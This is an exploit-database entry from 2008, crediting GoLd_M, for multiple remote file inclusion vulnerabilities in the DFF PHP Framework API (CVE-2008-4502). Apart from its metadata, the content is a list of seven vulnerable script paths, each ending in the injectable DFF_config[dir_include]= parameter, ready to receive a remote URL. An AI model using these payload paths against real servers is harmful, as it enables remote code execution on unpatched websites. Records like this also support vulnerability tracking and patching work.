DFF PHP Framework API - 'Data Feed File' Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2008-10-07
date_updated:
verified: 1
codes: OSVDB-48962;CVE-2008-4502;OSVDB-48961;OSVDB-48960;OSVDB-48959;OSVDB-48958;OSVDB-48957;OSVDB-48956
tags:
aliases:
screenshot_url:
application_url:
# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
# Exploits :
# /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
# Tryag.cc/cc
# milw0rm.com [2008-10-08]